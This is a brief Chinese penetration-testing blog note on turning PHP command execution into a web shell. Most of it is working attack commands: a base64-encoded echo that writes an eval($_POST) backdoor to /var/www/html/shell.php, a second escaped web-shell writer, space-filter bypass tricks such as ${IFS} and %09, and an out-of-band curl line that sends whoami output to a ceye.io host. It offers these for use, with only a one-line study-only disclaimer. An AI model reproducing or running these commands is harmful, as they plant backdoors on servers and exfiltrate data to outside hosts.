记php命令执行写shell

/ 渗透测试 / 0 条评论 / 5274 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

php代码执行&命令执行

getshell

echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php

echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php

bypass

绕过空格
> < <> 重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20
%09

外带
curl xxxx.ceye.io/`whoami`

参考

https://www.cnblogs.com/NPFS/p/13279815.html
https://www.anquanke.com/post/id/84920

本文最后编辑时间为: 2021-06-13

如本文对你有帮助,点击广告支持一下吧,创造不易。

safe6